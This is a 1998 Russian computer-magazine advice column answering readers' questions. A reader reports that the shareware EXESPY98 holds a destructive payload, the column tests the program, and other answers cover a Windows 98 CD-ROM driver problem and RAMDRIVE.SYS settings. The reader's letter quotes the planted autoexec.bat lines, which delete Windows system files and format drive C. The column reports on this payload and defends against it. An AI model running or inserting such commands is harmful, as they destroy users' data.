Архивы: по дате | по разделам | по авторам

Утюги и Чайники

Архив
автор : ИГОРЬ КНИЖНЫЙ, АЛЕКСАНДР ПЯТОШИН    08.09.1998

Премьера рубрики. Советы, основанные на реальном моделировании конкретных проблем читателей.

Под влиянием множества читательских писем мы решили ввести новую рубрику: "Утюги и Чайники". В сущности, ничего нового в ней нету: мы и раньше отвечали в "Письмоносце" на в той или иной мере заковыристые вопросы по софту и харду, однако ответы эти были поневоле краткими, а порой, и скомканными из-за традиционно небольшого места, отведенного "Письмоносцу". Кроме того, мы стремились (и постараемся продолжать эту политику) использовать "Письмоносец", в первую очередь, не как консультационную рубрику, а как окно общения (в самом широком, но, по преимуществу, - ироническом смысле) с читателем. За что читатель ее и любил, и, надеемся, не разлюбит и впредь.

Для ведения "Утюгов и Чайников", структурно повторяющих "Письмоносца" и, если угодно, расширяющих его, мы пригласили двоих программистов-профессионалов, и вместе - страстных любителей покопаться в компьютере: разобраться с его железом и софтом, и главное - с их взаимодействием. Одного из ведущих постоянные читатели "Компьютерры" знают давно - это Игорь Книжный. Другой - его коллега и друг Александр Пятошин.

Само собой разумеется, глубина и информационная насыщенность (а, возможно, и само дальнейшее существование) новой рубрики в очень большой степени будет зависеть от густоты и глубины вопросов, которые следует слать по адресу Iron@computerra.ru.

Евгений Козловский


 
"...у меня есть предложение ввести в журнале еще одну рубрику. Цель - рассказывать читателям о возможных проблемах с тем или иным программным обеспечением и возможных способах устранения этих проблем. На мой взгляд, это должно повысить рейтинг издания.

В качестве примера - деструктивная функция в программе EXESPY98 фирмы Prudens Inc.(www.spywindows.com). Нельзя, правда, сказать, что этот пакет представляет интерес для широкого круга пользователей, но факт налицо... При ошибочной регистрации сие творение заменяет файл autoexec.bat на:

@del c:\windows\*.exe
@del c:\windows\*.dll
@del c:\windows\system\*.exe
@del c:\windows\system\*.dll
@format c:

и т. д.

Проверено несколько раз. Ошибки быть не может! Последствия выполнения первых четырех строк понятны. Остальное зависит от внимательности пользователя, но это, зачастую, уже не важно.

Встроена эта функция сотрудниками самой фирмы. В принципе, это прекрасный повод для судебных исков, но, к сожалению, Prudens далеко...

С уважением. Алексей Грачев"

Мы протестировали эту программу, и хотя дело и не дошло до столь печального финала, как стирание системных файлов и, тем более, форматирование жесткого диска, ряд устрашающих предупреждений о незаконности использования программы и грядущего блокирования системы (впрочем, с возможностью восстановления данных при условии выплаты авторам штрафа) впечатлил. Как и желание авторов получать по 180 долларов за копию (или по 6 тыс. за набор для разработки каждой собственной программы с использованием предлагаемой библиотеки). Впрочем, дискуссии по поводу чьих бы то ни было денежных притязаний всегда бессмысленны.

С другой стороны, касаясь системы распространения программных продуктов shareware, вряд ли можно говорить о судебном преследовании, поскольку авторы неоднократно предупреждают о возможных последствиях в лицензионном соглашении, правда, они немного лукавят, упоминая о том, что в ключевом файле содержится важный код, который, в случае подстановки самодельного (пиратского) ключа, способен повредить систему, ведь разрушительный код заранее заложен в сам пакет... Но это не так уж и важно: пользователь предупрежден, и решение об использовании (или неиспользовании программы) он принимает исключительно на свой страх и риск. В конце концов, и крупные компании-разработчики "коробочного" софта, вроде Microsoft или Symantec, как правило, извещают, что не несут "ответственности за любой умышленный, являющийся результатом чего-либо, косвенный или подобный ущерб, включая потерю прибыли или данных, ставших результатом использования или невозможности использовать программу или какие-нибудь данные, входящие в комплект поставки..." (из лицензионного соглашения Symantec). Сильно сказано, а? Так чего же вы хотите от какой-то там Prudens?

Как программисты, мы можем понять отношение авторов к пиратам, распространяющим "на халяву" ключи к их пакету, но обычно среди авторов shareware-продуктов не принято наносить ущерб пользователю - по крайней мере, нам с подобной практикой непосредственно сталкиваться не приходилось. Использование такой "троянской" защиты способно доставить массу неприятностей не только "халявщикам", но и законным пользователям программы, ведь при случайной порче системного реестра, изменении конфигурации компьютера или просто в результате внутренних ошибок в защите (а кто может поручиться, что их там нет?) Prudens в любой момент может заявить: платите еще, или ваша система будет заблокирована (читай: уничтожена, поскольку выжить после форматирования очень непросто!).

Можно, конечно, попытаться хоть в какой-то степени защитить свой компьютер от подобных программ, но защита эта будет и ненадежной, и неудобной. Действительно, заменив с помощью какого-либо двоичного редактора строки "CONFIG.SYS" и "AUTOEXEC.BAT" в файле IO.SYS на "CONFI_.SYS" и "AUTOEXE_.BAT" соответственно (строку "AUTOEXEC.BAT" нужно заменить еще и в COMMAND.COM) и скопировав указанные файлы с новыми именами, мы обезопасим компьютер от примитивных атак с подменой содержимого AUTOEXEC.BAT и CONFIG.SYS, но одновременно сделаем невозможным автоматическое переконфигурирование системы при инсталляции новых программ, поскольку все изменения будут происходить в AUTOEXEC.BAT и CONFIG.SYS, тогда как при загрузке DOS и Windows система будет читать содержимое AUTOEXE_.BAT и CONFI_.SYS. Можно дополнительно переименовать FORMAT.COM, но ведь отформатировать пару цилиндров винчестера (а большего и не потребуется) нетрудно, и не используя утилиту FORMAT. Да и модификация системных файлов в этом случае не понадобится.

Но, к счастью, на Prudens свет клином не сошелся. Поиск в Интернете дал еще по крайней мере пару адресов, где можно найти функционально подобные EXESPY98 утилиты:

Кстати, никаких гарантий в отношении безопасности использования ЭТИХ утилит (или других shareware-программ) мы дать не можем. Да, и вот еще что: претензии по поводу использования приведенных выше рекомендаций ни авторами, ни редакцией не принимаются и не рассматриваются!

 
"...почему после установки Windows 98 у меня в системе перестал видеться CD-ROM? Материнская плата - ASUS P2B, винчестер - Fujitsu MPB3064, CD-ROM - Panasonic CR-585B. В Windows 95 был виден нормально, а теперь - только в режиме совместимости с MS-DOS с использованием DOS-драйверов...

А. Лапин"

Мы попытались смоделировать описанную Вами ситуацию. Удалось выяснить следующее. Если IDE CD драйв установлен как secondary slave, а secondary master в системе отсутствует, то Windows 98, даже если его инсталлировать с CD-ROM'а, после инсталляции перестает обнаруживать CD-драйв. Этого не происходит, если Windows 98 установить поверх Windows 95, причем в ту же директорию.

Возможны по крайней мере два пути решения этой проблемы. Можно либо переставить CD-драйв как secondary master или primary slave, либо использовать Bus mastering драйвер с прилагаемого к Вашей материнской плате компакт-диска. Вообще говоря, драйвер этот написан для Windows 95, и установить его нормальным путем нам не удалось (виноват не сам драйвер, а программа инсталляции, не знакомая с Windows 98), поэтому пришлось действовать в обход стандартной процедуры установки драйвера. Для этого с работающего под Windows 95 компьютера были взяты файлы IDEATAPI.INF, IDEATAPI.MPD и PIIXVSD.VXD. Переписав их в директории WIN98\INF (первый) и WIN98\SYSTEM\IOSUBSYS (второй и третий), мы удалили из системы драйвер контроллера жесткого диска, именующий себя "Intel AB/EB PCI Bus Master IDE Controller" и заменили его на "Intel AB PCI Bus Master IDE Controllers" (т. е. тот самый, с компакт-диска ASUS). После этого проблем с CD-драйвом под Windows 98 не возникало.

Трудно сказать, насколько универсально предлагаемое решение, но на Вашей материнской плате ASUS P2B оно должно сработать.

 
"...написать письмо меня заставил вот какой вопрос: "Как создать виртуальный диск (использование части оперативной памяти в виде диска) в операционной системе Windows 95?" Я пытался с этим разобраться самостоятельно, с помощью различных пособий и книг, но то ли пособия плохие, то ли я не совсем все понял - в общем, об этом я нигде ни слова не нашел. А ведь именно сейчас, когда оперативная память дешева как никогда, возникает желание использовать все ее возможности. Буду Вам очень признателен за освещение этого вопроса на страницах "Компьютерры", я думаю, это будет интересно многим пользователям ПК...

C уважением, Дмитрий Анисимов"

Создание виртуального диска в Windows 95 (или 98), как и в ранних версиях DOS, реализуется с помощью драйвера RAMDRIVE.SYS, поставляемого вместе с прочими файлами операционной системы. Синтаксис команды подключения драйвера тот же, что и раньше:

DEVICE=[d:path]RAMDRIVE.SYS [kBytes] [secSize] [dirEntry] [/E или /A]

здесь

d:path - полный путь к файлу RAMDRIVE.SYS, включая диск и директорию, например, "C:\WINDOWS\RAMDRIVE.SYS". Если путь не указан, то предполагается, что RAMDRIVE.SYS находится в корневой директории на загрузочном диске.

kBytes - полный размер виртуального диска в килобайтах. Максимальное значение - 32767. Это означает, что при помощи RAMDRIVE Вы не сможете использовать под виртуальный диск более 32 Мбайт оперативной памяти, даже если в Вашем компьютере ее на порядок больше.

secSize - размер сектора виртуального диска - 128, 256 или 512 байтов (по умолчанию - 512 байтов);

dirEntry - число точек входа в корневой директории диска, т. е. полное число файлов и директорий в корневой директории диска. По умолчанию - 64. Если в корневой директории виртуального диска предполагается разместить большее число файлов, этот параметр следует увеличить.

/E - разместить виртуальный диск в Extended memory (извините, но пояснять или переводить это словосочетание мы здесь не будем).

/A - разместить виртуальный диск в Expanded memory, если она имеется или эмулируется с помощью EMM386, QEMM или чего-то подобного им. Впрочем, это уж слишком изысканно - эмулировать сначала expanded в extended memory, а затем уже в ней разместить сэмулированное же дисковое устройство. Естественно, опции /E и /A исключают друг друга.

Следует заметить, что при размещении виртуального диска в Extended memory предварительно следует инициализировать эту самую Extended memory (строка

DEVICE=[d:path]HIMEM.SYS

в CONFIG.SYS). Все сказанное выше справедливо как для DOS 7.0, то есть Windows 95 без графической оболочки, так и собственно для Windows 95/98. Однако целесообразность использования виртуального диска в Windows нам представляется сомнительной. Дело в том, что современные Windows-приложения, весьма требовательные к количеству свободной оперативной памяти, при ее недостатке начинают работать существенно медленнее, а виртуальный диск, даже пустой, постоянно находится в ОЗУ...

С другой стороны, размеры виртуального диска недостаточны для размещения на нем директорий TEMP и TMP (временные файлы, создаваемые Windows-приложениями, часто составляют десятки мегабайтов). Однако в DOS 7.0 RAMDRIVE.SYS может оказаться небесполезным...

И. Книжный, А. Пятошин

© ООО "Компьютерра-Онлайн", 1997-2025
При цитировании и использовании любых материалов ссылка на "Компьютерру" обязательна.